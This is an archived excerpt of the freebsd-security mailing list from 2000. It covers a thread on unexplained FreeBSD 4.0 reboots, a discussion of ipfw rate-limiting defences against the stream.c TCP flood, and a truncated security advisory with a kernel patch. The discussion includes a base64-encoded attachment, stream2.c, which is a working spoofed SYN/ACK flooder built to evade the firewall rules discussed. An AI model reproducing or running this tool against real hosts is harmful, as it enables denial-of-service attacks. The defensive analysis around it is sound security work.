So I don't think you have any sort of DOS It would seem there is an issue with 4.0 which affects some of us Let us know if you find anything I will do the same regards Tim ----- Original Message ----- From: "Christiaan Rademan" To: Sent: Thursday, 22 June 2000 4:48 Subject: Hi All. Greetings.. We here have a FreeBSD 4.0-Stable server, running latest services. ie for mail. The problem is it has been rebooting from time to time.. No reason has been given to me in detail via the log file. The machine has definitly not been hacked according to some probes. I am left with a question, "Did I brake something, or is there a new DoS attack or something else" All I have done is changed the chflags on some odd directories /bin with -R. Directories: /bin - /sbin - /usr/bin - /usr/sbin - /usr/libexec Then I mostley went around removing +x filemodes from some slightly important suid exec, but theyr still excuteable by owner,group : root,wheel. Other than that, the server has definitly not got hardware problems, that has been replaced fully. I also have the system running kern.securelevel=3... via rc.conf I succesfully had a machine running with uptime for over 60days, with the changes. Although now I have to question why the machine reboots during the week? So far, it looks like the kernel is screwing up, for no known reason. I am about to try running the machine on a generic kernel, maybe make an attempt to see if it still brakes. If anyone has a clue what might be going wrong here, please contact me.. Regards, Christiaan Rademan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 22 2:31:15 2000 Delivered-To: freebsd-security@freebsd.org Received: from adm.sci-nnov.ru (adm.sci-nnov.ru [195.122.226.2]) by hub.freebsd.org (Postfix) with ESMTP id D931337C21D for ; Thu, 22 Jun 2000 02:30:53 -0700 (PDT) (envelope-from 3APA3A@SECURITY.NNOV.RU) Received: from anonymous.sandy.ru (anonymous.sandy.ru [195.122.226.40]) by adm.sci-nnov.ru (8.9.3/Dmiter-4.1-AGK-0.3) with ESMTP id NAA89563; Thu, 22 Jun 2000 13:24:18 +0400 (MSD) Content-Transfer-Encoding: 8bit Date: Thu, 22 Jun 2000 13:24:21 +0400 From: 3APA3A <3APA3A@SECURITY.NNOV.RU> X-Mailer: The Bat! (v1.41) Reply-To: 3APA3A <3APA3A@SECURITY.NNOV.RU> Organization: Sandy Info X-Priority: 3 (Normal) Message-ID: <10558.000622@sandy.ru> To: "Maksimov Maksim" , Subject: Re: How defend from stream2.c attack? (Fwd: Re[2]: explanation and code for stream.c issues) Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="----------4B7E20EB2F02F8" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ------------4B7E20EB2F02F8 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To remind what is stream2.c I wonder it still working after disabling RST, but may be it's because of combining SYN packets with invalid ACK packets. May be it's just another kind of attack and it's not connected with flood. My recommendation on blocking this attack is to limit a number of packets in a unit of time, as shown below. But it still not tested :( http://www.security.nnov.ru /\_/\ { . . } |\ +--oQQo->{ ^ }<-----+ \ | 3APA3A U 3APA3A } +-------------o66o--+ / |/ You know my name - look up my number (The Beatles) This is a forwarded message From: Vladimir Dubrovin To: Tim Yardley Subject: explanation and code for stream.c issues ===8<==============Original message text=============== 21.01.00 22:15, you wrote: explanation and code for stream.c issues; >>T> -- start rule set -- >>T> block in quick proto tcp from any to any head 100 >>T> pass in quick proto tcp from any to any flags S keep state group 100 >>T> pass in all >>T> -- end rule set -- >> >>Attack can be easily changed to send pair SYN and invalid SYN/ACK My mistake here - SYN/ACK packet isn't required. Sorry, i wrote this message after 11 hours of work. Intruder sends SYN packet and then sends, lets say 1000 ACK packets to the same port from same port and source address. SYN packet will open ipfilter to pass all others packets. This attack doesn't need randomization for each packet. By the way - published stream.c doesn't use ACK bit at all. packet.tcp.th_flags = 0; It looks like usual flooder and can be easily filtered with ipfw by blocking packets without any flags set (this packets are invalid for TCP). allow tcp from any to any tcpflags ack allow tcp from any to any tcpflags syn allow tcp from any to any tcpflags syn,ack allow tcp from any to any tcpflags rst ... deny tcp from any to any Attached is patched stream.c which sends (SYN packet + 1023 ACK packets) from random port and source. This ipfw rule and published ipfilter rule will be unusable against this attack. In my current location i can't test it. T> As was mentioned in the "advisory/explanation" on the issue, ipfw cannot T> deal with the problem due to the fact that it is stateless. T> The attack comes from random ip addresses, therefore throttling like that T> only hurts your connection or solves nothing at all. In other words, the T> random sourcing and method of the attack, makes a non-stateless firewall T> useless. It would be better if you reed the rule before answering. Of cause, ipfw can't find invalid ACK packets. But if OS supports DUMMYNET option ipfw can be used to limit the number of packets in a fixed amount of time. In this case: ipfw pipe 10 config delay 50 queue 500 packets ipfw add pipe 10 tcp from any to $MYHOST in via $EXTERNAL we limit router to allow only 500 TCP packets in every 50ms. Average size of tcp packet is approx. 500 bytes (you can test it). So, you allow bandwidth of 40M pbs for standard TCP traffic. But this rule will effectively block any spoofing attack which uses small packets. If 50-bytes packets are used this rule will allow only bandwith 4M bps for such attack. Not only "ACK" attack, but any flood. We didn't check source, so we're safe againt any spoofing. Of cause in this case you will loose TCP packets during an attack and connections can be dropped, but at least your host will be safe. As it was pointed, _any_ packet filter, including ipfilter, can't solve this problem completely. +=-=-=-=-=-=-=-=-=+ |Vladimir Dubrovin| | Sandy Info, ISP | +=-=-=-=-=-=-=-=-=+ ===8<===========End of original message text=========== ------------4B7E20EB2F02F8 Content-Type: application/octet-stream; name="stream2.c" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="stream2.c" I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RkbGliLmg+DQojaW5jbHVkZSA8dW5pc3Rk Lmg+DQojaW5jbHVkZSA8c3RyaW5ncy5oPg0KI2luY2x1ZGUgPHN5cy90aW1lLmg+DQojaW5jbHVk ZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2lmbmRlZiBfX1VTRV9C U0QNCiNkZWZpbmUgX19VU0VfQlNEDQojZW5kaWYNCiNpZm5kZWYgX19GQVZPUl9CU0QNCiNkZWZp bmUgX19GQVZPUl9CU0QNCiNlbmRpZg0KI2luY2x1ZGUgPG5ldGluZXQvaW5fc3lzdG0uaD4NCiNp bmNsdWRlIDxuZXRpbmV0L2luLmg+DQojaW5jbHVkZSA8bmV0aW5ldC9pcC5oPg0KI2luY2x1ZGUg PG5ldGluZXQvdGNwLmg+DQojaW5jbHVkZSA8YXJwYS9pbmV0Lmg+DQojaW5jbHVkZSA8bmV0ZGIu aD4NCg0KI2lmZGVmIExJTlVYDQojZGVmaW5lIEZJWCh4KSAgaHRvbnMoeCkNCiNlbHNlDQojZGVm aW5lIEZJWCh4KSAgKHgpDQojZW5kaWYNCg0Kc3RydWN0IGlwX2hkciB7DQogICAgdV9pbnQgICAg ICAgaXBfaGw6NCwgICAgICAgICAgICAgICAgLyogaGVhZGVyIGxlbmd0aCBpbiAzMiBiaXQgd29y ZHMgKi8NCiAgICAgICAgICAgICAgICBpcF92OjQ7ICAgICAgICAgICAgICAgICAvKiBpcCB2ZXJz aW9uICovDQogICAgdV9jaGFyICAgICAgaXBfdG9zOyAgICAgICAgICAgICAgICAgLyogdHlwZSBv ZiBzZXJ2aWNlICovDQogICAgdV9zaG9ydCAgICAgaXBfbGVuOyAgICAgICAgICAgICAgICAgLyog dG90YWwgcGFja2V0IGxlbmd0aCAqLw0KICAgIHVfc2hvcnQgICAgIGlwX2lkOyAgICAgICAgICAg ICAgICAgIC8qIGlkZW50aWZpY2F0aW9uICovDQogICAgdV9zaG9ydCAgICAgaXBfb2ZmOyAgICAg ICAgICAgICAgICAgLyogZnJhZ21lbnQgb2Zmc2V0ICovDQogICAgdV9jaGFyICAgICAgaXBfdHRs OyAgICAgICAgICAgICAgICAgLyogdGltZSB0byBsaXZlICovDQogICAgdV9jaGFyICAgICAgaXBf cDsgICAgICAgICAgICAgICAgICAgLyogcHJvdG9jb2wgKi8NCiAgICB1X3Nob3J0ICAgICBpcF9z dW07ICAgICAgICAgICAgICAgICAvKiBpcCBjaGVja3N1bSAqLw0KICAgIHVfbG9uZyAgICAgIHNh ZGRyLCBkYWRkcjsgICAgICAgICAgIC8qIHNvdXJjZSBhbmQgZGVzdCBhZGRyZXNzICovDQp9Ow0K DQpzdHJ1Y3QgdGNwX2hkciB7DQogICAgdV9zaG9ydCAgICAgdGhfc3BvcnQ7ICAgICAgICAgICAg ICAgLyogc291cmNlIHBvcnQgKi8NCiAgICB1X3Nob3J0ICAgICB0aF9kcG9ydDsgICAgICAgICAg ICAgICAvKiBkZXN0aW5hdGlvbiBwb3J0ICovDQogICAgdV9sb25nICAgICAgdGhfc2VxOyAgICAg ICAgICAgICAgICAgLyogc2VxdWVuY2UgbnVtYmVyICovDQogICAgdV9sb25nICAgICAgdGhfYWNr OyAgICAgICAgICAgICAgICAgLyogYWNrbm93bGVkZ2VtZW50IG51bWJlciAqLw0KICAgIHVfaW50 ICAgICAgIHRoX3gyOjQsICAgICAgICAgICAgICAgIC8qIHVudXNlZCAqLw0KICAgICAgICAgICAg ICAgIHRoX29mZjo0OyAgICAgICAgICAgICAgIC8qIGRhdGEgb2Zmc2V0ICovDQogICAgdV9jaGFy ICAgICAgdGhfZmxhZ3M7ICAgICAgICAgICAgICAgLyogZmxhZ3MgZmllbGQgKi8NCiAgICB1X3No b3J0ICAgICB0aF93aW47ICAgICAgICAgICAgICAgICAvKiB3aW5kb3cgc2l6ZSAqLw0KICAgIHVf c2hvcnQgICAgIHRoX3N1bTsgICAgICAgICAgICAgICAgIC8qIHRjcCBjaGVja3N1bSAqLw0KICAg IHVfc2hvcnQgICAgIHRoX3VycDsgICAgICAgICAgICAgICAgIC8qIHVyZ2VudCBwb2ludGVyICov DQp9Ow0KDQpzdHJ1Y3QgdGNwb3B0X2hkciB7DQogICAgdV9jaGFyICB0eXBlOyAgICAgICAgICAg ICAgICAgICAgICAgLyogdHlwZSAqLw0KICAgIHVfY2hhciAgbGVuOyAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgLyogbGVuZ3RoICovDQogICAgdV9zaG9ydCB2YWx1ZTsgICAgICAgICAg ICAgICAgICAgICAgLyogdmFsdWUgKi8NCn07DQoNCnN0cnVjdCBwc2V1ZG9faGRyIHsgICAgICAg ICAgICAgICAgICAgICAvKiBTZWUgUkZDIDc5MyBQc2V1ZG8gSGVhZGVyICovDQogICAgdV9sb25n IHNhZGRyLCBkYWRkcjsgICAgICAgICAgICAgICAgICAgICAgICAvKiBzb3VyY2UgYW5kIGRlc3Qg YWRkcmVzcyAqLw0KICAgIHVfY2hhciBtYnosIHB0Y2w7ICAgICAgICAgICAgICAgICAgIC8qIHpl cm8gYW5kIHByb3RvY29sICovDQogICAgdV9zaG9ydCB0Y3BsOyAgICAgICAgICAgICAgICAgICAg ICAgLyogdGNwIGxlbmd0aCAqLw0KfTsNCg0Kc3RydWN0IHBhY2tldCB7DQogICAgc3RydWN0IGlw LypfaGRyKi8gaXA7DQogICAgc3RydWN0IHRjcGhkciB0Y3A7DQovKiBzdHJ1Y3QgdGNwb3B0X2hk ciBvcHQ7ICovDQp9Ow0KDQpzdHJ1Y3QgY2tzdW0gew0KICAgIHN0cnVjdCBwc2V1ZG9faGRyIHBz ZXVkbzsNCiAgICBzdHJ1Y3QgdGNwaGRyIHRjcDsNCn07DQoNCnN0cnVjdCBwYWNrZXQgcGFja2V0 Ow0Kc3RydWN0IGNrc3VtIGNrc3VtOw0Kc3RydWN0IHNvY2thZGRyX2luIHNfaW47DQp1X3Nob3J0 IGRzdHBvcnQsIHBrdHNpemUsIHBwczsNCnVfbG9uZyBkc3RhZGRyOw0KaW50IHNvY2s7DQoNCnZv aWQgdXNhZ2UoY2hhciAqcHJvZ25hbWUpDQp7DQogICAgZnByaW50ZihzdGRlcnIsICJVc2FnZTog JXMgPGRzdGFkZHI+IDxkc3Rwb3J0PiA8cGt0c2l6ZT4gPHBwcz5cbiIsIA0KcHJvZ25hbWUpOw0K ICAgIGZwcmludGYoc3RkZXJyLCAiICAgIGRzdGFkZHIgIC0gdGhlIHRhcmdldCB3ZSBhcmUgdHJ5 aW5nIHRvIGF0dGFjay5cbiIpOw0KICAgIGZwcmludGYoc3RkZXJyLCAiICAgIGRzdHBvcnQgIC0g dGhlIHBvcnQgb2YgdGhlIHRhcmdldCwgMCA9IHJhbmRvbS5cbiIpOw0KICAgIGZwcmludGYoc3Rk ZXJyLCAiICAgIHBrdHNpemUgIC0gdGhlIGV4dHJhIHNpemUgdG8gdXNlLiAgMCA9IG5vcm1hbCAN CnN5bi5cbiIpOw0KICAgIGV4aXQoMSk7DQp9DQoNCi8qIFRoaXMgaXMgYSByZWZlcmVuY2UgaW50 ZXJuZXQgY2hlY2tzdW0gaW1wbGltZW50YXRpb24sIG5vdCB2ZXJ5IGZhc3QgKi8NCmlubGluZSB1 X3Nob3J0IGluX2Nrc3VtKHVfc2hvcnQgKmFkZHIsIGludCBsZW4pDQp7DQogICAgcmVnaXN0ZXIg aW50IG5sZWZ0ID0gbGVuOw0KICAgIHJlZ2lzdGVyIHVfc2hvcnQgKncgPSBhZGRyOw0KICAgIHJl Z2lzdGVyIGludCBzdW0gPSAwOw0KICAgIHVfc2hvcnQgYW5zd2VyID0gMDsNCg0KICAgICAvKiBP dXIgYWxnb3JpdGhtIGlzIHNpbXBsZSwgdXNpbmcgYSAzMiBiaXQgYWNjdW11bGF0b3IgKHN1bSks IHdlIGFkZA0KICAgICAgKiBzZXF1ZW50aWFsIDE2IGJpdCB3b3JkcyB0byBpdCwgYW5kIGF0IHRo ZSBlbmQsIGZvbGQgYmFjayBhbGwgdGhlDQogICAgICAqIGNhcnJ5IGJpdHMgZnJvbSB0aGUgdG9w IDE2IGJpdHMgaW50byB0aGUgbG93ZXIgMTYgYml0cy4gKi8NCg0KICAgICB3aGlsZSAobmxlZnQg PiAxKSAgew0KICAgICAgICAgc3VtICs9ICp3Kys7DQogICAgICAgICBubGVmdCAtPSAyOw0KICAg ICB9DQoNCiAgICAgLyogbW9wIHVwIGFuIG9kZCBieXRlLCBpZiBuZWNlc3NhcnkgKi8NCiAgICAg aWYgKG5sZWZ0ID09IDEpIHsNCiAgICAgICAgICoodV9jaGFyICopKCZhbnN3ZXIpID0gKih1X2No YXIgKikgdzsNCiAgICAgICAgIHN1bSArPSBhbnN3ZXI7DQogICAgIH0NCg0KICAgICAvKiBhZGQg YmFjayBjYXJyeSBvdXRzIGZyb20gdG9wIDE2IGJpdHMgdG8gbG93IDE2IGJpdHMgKi8NCiAgICAg c3VtID0gKHN1bSA+PiAxNikgKyAoc3VtICYgMHhmZmZmKTsgLyogYWRkIGhpIDE2IHRvIGxvdyAx NiAqLw0KICAgICBzdW0gKz0gKHN1bSA+PiAxNik7ICAgICAgICAgICAgICAgIC8qIGFkZCBjYXJy eSAqLw0KICAgICBhbnN3ZXIgPSB+c3VtOyAgICAgICAgICAgICAgICAgICAgIC8qIHRydW5jYXRl IHRvIDE2IGJpdHMgKi8NCiAgICAgcmV0dXJuKGFuc3dlcik7DQp9DQoNCnVfbG9uZyBsb29rdXAo Y2hhciAqaG9zdG5hbWUpDQp7DQogICAgc3RydWN0IGhvc3RlbnQgKmhwOw0KDQogICAgaWYgKCho cCA9IGdldGhvc3RieW5hbWUoaG9zdG5hbWUpKSA9PSBOVUxMKSB7DQogICAgICAgZnByaW50Zihz dGRlcnIsICJDb3VsZCBub3QgcmVzb2x2ZSAlcy5cbiIsIGhvc3RuYW1lKTsNCiAgICAgICBleGl0 KDEpOw0KICAgIH0NCg0KICAgIHJldHVybiAqKHVfbG9uZyAqKWhwLT5oX2FkZHI7DQp9DQoNCg0K dm9pZCBmbG9vZGVyKHZvaWQpDQp7DQogICAgc3RydWN0IHRpbWVzcGVjIHRzOw0KICAgIGludCBp Ow0KDQoNCiAgICBtZW1zZXQoJnBhY2tldCwgMCwgc2l6ZW9mKHBhY2tldCkpOw0KDQogICAgdHMu dHZfc2VjICAgICAgICAgICAgICAgICAgID0gMDsNCiAgICB0cy50dl9uc2VjICAgICAgICAgICAg ICAgICAgPSAxMDsNCg0KICAgIHBhY2tldC5pcC5pcF9obCAgICAgICAgICAgICA9IDU7DQogICAg cGFja2V0LmlwLmlwX3YgICAgICAgICAgICAgID0gNDsNCiAgICBwYWNrZXQuaXAuaXBfcCAgICAg ICAgICAgICAgPSBJUFBST1RPX1RDUDsNCiAgICBwYWNrZXQuaXAuaXBfdG9zICAgICAgICAgICAg PSAweDA4Ow0KICAgIHBhY2tldC5pcC5pcF9pZCAgICAgICAgICAgICA9IHJhbmQoKTsNCiAgICBw YWNrZXQuaXAuaXBfbGVuICAgICAgICAgICAgPSBGSVgoc2l6ZW9mKHBhY2tldCkpOw0KICAgIHBh Y2tldC5pcC5pcF9vZmYgICAgICAgICAgICA9IDA7IC8qIElQX0RGPyAqLw0KICAgIHBhY2tldC5p cC5pcF90dGwgICAgICAgICAgICA9IDI1NTsNCiAgICBwYWNrZXQuaXAuaXBfZHN0LnNfYWRkciAg ICAgPSByYW5kb20oKTsNCg0KICAgIHBhY2tldC50Y3AudGhfZmxhZ3MgICAgICAgICA9IDA7DQog ICAgcGFja2V0LnRjcC50aF93aW4gICAgICAgICAgID0gaHRvbnMoMTYzODQpOw0KICAgIHBhY2tl dC50Y3AudGhfc2VxICAgICAgICAgICA9IHJhbmRvbSgpOw0KICAgIHBhY2tldC50Y3AudGhfYWNr ICAgICAgICAgICA9IDA7DQogICAgcGFja2V0LnRjcC50aF9vZmYgICAgICAgICAgID0gNTsgLyog NSAqLw0KICAgIHBhY2tldC50Y3AudGhfdXJwICAgICAgICAgICA9IDA7DQogICAgcGFja2V0LnRj cC50aF9kcG9ydCAgICAgICAgID0gZHN0cG9ydD9odG9ucyhkc3Rwb3J0KTpyYW5kKCk7DQoNCi8q DQogICAgcGFja2V0Lm9wdC50eXBlICAgICAgICAgICAgID0gMHgwMjsNCiAgICBwYWNrZXQub3B0 LmxlbiAgICAgICAgICAgICAgPSAweDA0Ow0KICAgIHBhY2tldC5vcHQudmFsdWUgICAgICAgICAg ICA9IGh0b25zKDE0NjApOw0KKi8NCg0KDQogICAgY2tzdW0ucHNldWRvLmRhZGRyICAgICAgICAg ID0gZHN0YWRkcjsNCiAgICBja3N1bS5wc2V1ZG8ubWJ6ICAgICAgICAgICAgPSAwOw0KICAgIGNr c3VtLnBzZXVkby5wdGNsICAgICAgICAgICA9IElQUFJPVE9fVENQOw0KICAgIGNrc3VtLnBzZXVk by50Y3BsICAgICAgICAgICA9IGh0b25zKHNpemVvZihzdHJ1Y3QgdGNwaGRyKSk7DQoNCiAgICBz X2luLnNpbl9mYW1pbHkgICAgICAgICAgICAgPSBBRl9JTkVUOw0KICAgIHNfaW4uc2luX2FkZHIu c19hZGRyICAgICAgICAgICAgICAgID0gZHN0YWRkcjsNCiAgICBzX2luLnNpbl9wb3J0ICAgICAg ICAgICAgICAgPSBwYWNrZXQudGNwLnRoX2Rwb3J0Ow0KDQogICAgZm9yKGk9MDs7KytpKSB7DQov KiANCglwYXRjaGVkIGJ5IDNBUEEzQSB0byBzZW5kIDEgc3luIHBhY2tldCArIDEwMjMgQUNLIHBh Y2tldHMuIA0KDQoqLw0KICAgIGlmKCAhKGkmMHgzRkYpICkgew0KCXBhY2tldC50Y3AudGhfc3Bv cnQgPSByYW5kKCk7DQoJY2tzdW0ucHNldWRvLnNhZGRyID0gcGFja2V0LmlwLmlwX3NyYy5zX2Fk ZHIgPSByYW5kb20oKTsNCglwYWNrZXQudGNwLnRoX2ZsYWdzID0gVEhfU1lOOw0KICAgICAgICBw YWNrZXQudGNwLnRoX2FjayAgICAgICAgICAgPSAwOw0KDQogICAgfQ0KICAgIGVsc2Ugew0KCXBh Y2tldC50Y3AudGhfZmxhZ3MgPSBUSF9BQ0s7DQoJcGFja2V0LnRjcC50aF9hY2sgPSByYW5kKCk7 DQogICAgfQ0KDQoNCiAgICAvKiBja3N1bS5wc2V1ZG8uc2FkZHIgPSBwYWNrZXQuaXAuaXBfc3Jj LnNfYWRkciA9IHJhbmRvbSgpOyAqLw0KICAgICAgICsrcGFja2V0LmlwLmlwX2lkOw0KICAgICAg IC8qKytwYWNrZXQudGNwLnRoX3Nwb3J0Ki87DQogICAgICAgKytwYWNrZXQudGNwLnRoX3NlcTsN Cg0KICAgICAgIGlmICghZHN0cG9ydCkNCiAgICAgICAgICBzX2luLnNpbl9wb3J0ID0gcGFja2V0 LnRjcC50aF9kcG9ydCA9IHJhbmQoKTsNCg0KICAgICAgIHBhY2tldC5pcC5pcF9zdW0gICAgICAg ICA9IDA7DQogICAgICAgcGFja2V0LnRjcC50aF9zdW0gICAgICAgICAgICAgICAgPSAwOw0KDQog ICAgICAgY2tzdW0udGNwICAgICAgICAgICAgICAgICAgICAgICAgPSBwYWNrZXQudGNwOw0KDQog ICAgICAgcGFja2V0LmlwLmlwX3N1bSAgICAgICAgID0gaW5fY2tzdW0oKHZvaWQgKikmcGFja2V0 LmlwLCAyMCk7DQogICAgICAgcGFja2V0LnRjcC50aF9zdW0gICAgICAgICAgICAgICAgPSBpbl9j a3N1bSgodm9pZCAqKSZja3N1bSwgc2l6ZW9mKGNrc3VtKSk7DQoNCiAgICAgICBpZiAoc2VuZHRv KHNvY2ssICZwYWNrZXQsIHNpemVvZihwYWNrZXQpLCAwLCAoc3RydWN0IHNvY2thZGRyIA0KKikm c19pbiwgc2l6ZW9mKHNfaW4pKSA8IDApDQogICAgICAgICAgcGVycm9yKCJqZXNzIik7DQoNCiAg ICB9DQp9DQoNCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogICAgaW50IG9u ID0gMTsNCg0KICAgIHByaW50Zigic3RyZWFtLmMgdjEuMDEgLSBUQ1AgUGFja2V0IFN0b3JtXG4i KTsNCg0KICAgIGlmICgoc29jayA9IHNvY2tldChQRl9JTkVULCBTT0NLX1JBVywgSVBQUk9UT19S QVcpKSA8IDApIHsNCiAgICAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgICAgIGV4aXQoMSk7DQog ICAgfQ0KDQogICAgc2V0Z2lkKGdldGdpZCgpKTsgc2V0dWlkKGdldHVpZCgpKTsNCg0KICAgIGlm IChhcmdjIDwgNCkNCiAgICAgICB1c2FnZShhcmd2WzBdKTsNCg0KICAgIGlmIChzZXRzb2Nrb3B0 KHNvY2ssIElQUFJPVE9fSVAsIElQX0hEUklOQ0wsIChjaGFyICopJm9uLCBzaXplb2Yob24pKSA8 IA0KMCkgew0KICAgICAgIHBlcnJvcigic2V0c29ja29wdCIpOw0KICAgICAgIGV4aXQoMSk7DQog ICAgfQ0KDQogICAgc3JhbmQoKHRpbWUoTlVMTCkgXiBnZXRwaWQoKSkgKyBnZXRwcGlkKCkpOw0K DQogICAgcHJpbnRmKCJcblJlc29sdmluZyBJUHMuLi4iKTsgZmZsdXNoKHN0ZG91dCk7DQoNCiAg ICBkc3RhZGRyICAgICA9IGxvb2t1cChhcmd2WzFdKTsNCiAgICBkc3Rwb3J0ICAgICA9IGF0b2ko YXJndlsyXSk7DQogICAgcGt0c2l6ZSAgICAgPSBhdG9pKGFyZ3ZbM10pOw0KDQogICAgcHJpbnRm KCJTZW5kaW5nLi4uIik7IGZmbHVzaChzdGRvdXQpOw0KDQogICAgZmxvb2RlcigpOw0KDQogICAg cmV0dXJuIDA7DQp9DQo= ------------4B7E20EB2F02F8-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 22 3:33:14 2000 Delivered-To: freebsd-security@freebsd.org Received: from gateway.bangsplat.org (h00e02962237e.ne.mediaone.net [24.147.164.44]) by hub.freebsd.org (Postfix) with ESMTP id 0864B37C236 for ; Thu, 22 Jun 2000 03:33:06 -0700 (PDT) (envelope-from georgeh@bangsplat.org) Received: from pentium (unknown [192.168.1.3]) by gateway.bangsplat.org (Postfix) with SMTP id 965F4CC; Thu, 22 Jun 2000 06:33:02 -0400 (EDT) Message-ID: <001301bfdc35$3dbff170$0301a8c0@pentium> From: "George Hartz" To: "Tim McCullagh" , "Christiaan Rademan" , References: <3951B6C8.DA609831@mics.co.za> <00eb01bfdc27$35e50520$778d25cb@halenet.com.au> Subject: Re: Hi All. Date: Thu, 22 Jun 2000 06:33:01 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6700 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org One of the systems I use as a frewall is running 4.0 as well, and is doing the same thing. It was on some hardware that I'd had some reliability problems with in the past (bad DIMM), but two days ago I replaced the DIMM, and was rather unhappy to discover yesterday that its still doing it. I've actually seen it do it dozens of times, but never thought to make note of the error that popped up since I assume its a hardware problem. Compiling a custom kernel hasn't helped though. I certainly see a lot of attempts at DOS attacks and port scans being on a cable modem, but there doesn't seem to be any relation between catching such a scan and the system doing a reboot. According to the system its been about five hours since it happened, which is longer than usual. Its usually about once an hour. I'll post if I find anything, now that I know it may be more than just a hardware issue. - George ----- Original Message ----- From: "Tim McCullagh" To: "Christiaan Rademan" ; Sent: Thursday, June 22, 2000 4:52 AM Subject: Re: Hi All. > Hi Christiaan, > > I am having the same problem. I posted a message to the ISP list a couple > of days ago and it seems as if a number of people are having the same > problem.. It has been suggested that I should compile a custom kernel to > get around it. Some of the responses have suggested going back to 3.4 > rather than 4.0 > > So I don't think you have any sort of DOS > > It would seem there is an issue with 4.0 which affects some of us > > > Let us know if you find anything > I will do the same > > regards > > Tim > > ----- Original Message ----- > From: "Christiaan Rademan" > To: > Sent: Thursday, 22 June 2000 4:48 > Subject: Hi All. > > > Greetings.. > > We here have a FreeBSD 4.0-Stable server, running latest services. ie > for mail. > The problem is it has been rebooting from time to time.. No reason has > been given to me > in detail via the log file. The machine has definitly not been hacked > according to some probes. > > I am left with a question, "Did I brake something, or is there a new > DoS attack or something else" > > All I have done is changed the chflags on some odd directories /bin with > -R. > Directories: /bin - /sbin - /usr/bin - /usr/sbin - /usr/libexec > > Then I mostley went around removing +x filemodes from some slightly > important suid exec, but > theyr still excuteable by owner,group : root,wheel. > > Other than that, the server has definitly not got hardware problems, > that has been replaced fully. > > I also have the system running kern.securelevel=3... via rc.conf > > I succesfully had a machine running with uptime for over 60days, with > the changes. > Although now I have to question why the machine reboots during the week? > > So far, it looks like the kernel is screwing up, for no known reason. > > I am about to try running the machine on a generic kernel, maybe make an > attempt to see > if it still brakes. > > If anyone has a clue what might be going wrong here, please contact me.. > > Regards, Christiaan Rademan > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 22 14:51: 3 2000 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id D642E37BF12; Thu, 22 Jun 2000 14:50:52 -0700 (PDT) From: FreeBSD Security Advisories Subject: FreeBSD Security Advisory: FreeBSD-SA-00:23.ip-options Reply-To: security-advisories@freebsd.org From: FreeBSD Security Advisories Message-Id: <20000622215052.D642E37BF12@hub.freebsd.org> Date: Thu, 22 Jun 2000 14:50:52 -0700 (PDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-00:23 Security Advisory FreeBSD, Inc. Topic: Remote denial-of-service in IP stack Category: core Module: kernel Announced: 2000-06-19 Affects: FreeBSD systems prior to the correction date Credits: NetBSD Security Advisory 2000-002, and Jun-ichiro itojun Hagino Corrected: (Several bugs fixed, the date below is that of the most recent fix) 2000-06-08 (3.4-STABLE) 2000-06-08 (4.0-STABLE) 2000-06-02 (5.0-CURRENT) FreeBSD only: NO I. Background II. Problem Description There are several bugs in the processing of IP options in the FreeBSD IP stack, which fail to correctly bounds-check arguments and contain other coding errors leading to the possibility of data corruption and a kernel panic upon reception of certain invalid IP packets. This set of bugs includes the instance of the vulnerability described in NetBSD Security Advisory 2000-002 (see ftp://ftp.NetBSD.ORG/pub/NetBSD/misc/security/advisories/NetBSD-SA2000-002.txt.asc) as well as other bugs with similar effect. III. Impact Remote users can cause a FreeBSD system to panic and reboot. IV. Workaround None available. V. Solution One of the following: 1) Upgrade your FreeBSD system to 3.4-STABLE, 4.0-STABLE or 5.0-CURRENT after the respective correction dates. 2) Apply the patch below and recompile your kernel. Either save this advisory to a file, or download the patch and detached PGP signature from the following locations, and verify the signature using your PGP utility. ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:23/ip_options.diff ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:23/ip_options.diff.asc # cd /usr/src/sys/netinet # patch -p < /path/to/patch_or_advisory [ Recompile your kernel as described in http://www.freebsd.org/handbook/kernelconfig.html and reboot the system ] Index: ip_icmp.c =================================================================== RCS file: /ncvs/src/sys/netinet/ip_icmp.c,v retrieving revision 1.39 diff -u -r1.39 ip_icmp.c --- ip_icmp.c 2000/01/28 06:13:09 1.39 +++ ip_icmp.c 2000/06/08 15:26:39 @@ -662,8 +662,11 @@ if (opt == IPOPT_NOP) len = 1; else { + if (cnt < IPOPT_OLEN + sizeof(*cp)) + break; len = cp[IPOPT_OLEN]; - if (len <= 0 || len > cnt) + if (len < IPOPT_OLEN + sizeof(*cp) || + len > cnt) break; } /* Index: ip_input.c =================================================================== RCS file: /ncvs/src/sys/netinet/ip_input.c,v retrieving revision 1.130 diff -u 